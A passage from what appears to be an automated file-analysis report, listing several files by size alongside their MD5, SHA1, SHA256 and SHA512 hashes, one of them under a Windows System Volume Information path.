SHA1014f5ffc5706038a46c73a2d8d5e74111aa445f9
SHA2562196fa848c393869bdfd53100c3cb4d789e879f83cb464f5ccd72c75807cfc0a
SHA512d3c5205fc98301434aa6806d74478ebfe4327d727193a5dd809b2f7f479eb05cf215779a2c47ae26de22f793a2367a3df717e409c86c760fa613a609f89d06ed
-
Filesize
13KB
MD54d4b3ad8151f40ad3b65c52442533012
SHA1d27a1b856b5dc495eaad7fda0c6af0838d7a7b1f
SHA256c77c3899a7ba2198a2de194ec3c18fa3e53bb61440828a2608e3b23858007f67
SHA51257933e355dee9a5f66fbc087de21e56d5811d00bc13bc0d7c2f622d7b276b35efabb2b4c9eeb96bf4a405b8b42bf70fa40b6760b6f9bede02e49838ef991856e
-
Filesize
907B
MD5fdc64bc26fbde79241ad979de5faac14
SHA1003b016cb37957cd63c9c7f4e899d9de76d0c4a0
SHA256e7ca83fc4415d068652b6fc9847389d25ecac8a09be81e097e95cadc0ad32d00
SHA512c685c678757e3776921345e2a23cff586af5de4ab066a441120e9c3da6cdf5129b66926efeb4c595e788033bc46cc1942cc4c3c6a48bb0fc08cf73af42d80e6e
-
Filesize
24.1MB
MD5726005ec6f648ddcd01a50fe7113d175
SHA1c296fe1fbbdde48282e9dcc66c98d82183ce0324
SHA2565e4ec88186459bab16c915f320896013ec50249e22d0cd062fccb3f299fa89b0
SHA512f383155d088fe2ac6fb850a74ad5a84e53043057b3865e28c1f6220bcfa5d58885c7433a2bbf0bbb1e09db2c6d60b81d97563ce271922f3eb547b81c3258d82d
-
\??\Volume{359f35d2-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{ae2d1cd0-ad3f-4a95-a754-1eaf9763b825}_OnDiskSnapshotProp
Filesize6KB
MD5147260547d70083042419900da98ea91
SHA12faa885e77e305475cb32ecd3e58b49c93eb705d
SHA256a73373e3b233ddf63a5e6f6da8528b77b1a1c8c8fc2084a688a4669f0c3fcf6b
SHA512fca34e58aaebc337c4a78f4613bc21c885eb45ea394a502f2034a4264bc8be4831485e18c4dec19e33908057648860b6d148f98989aa39f741169a0a4f48a73e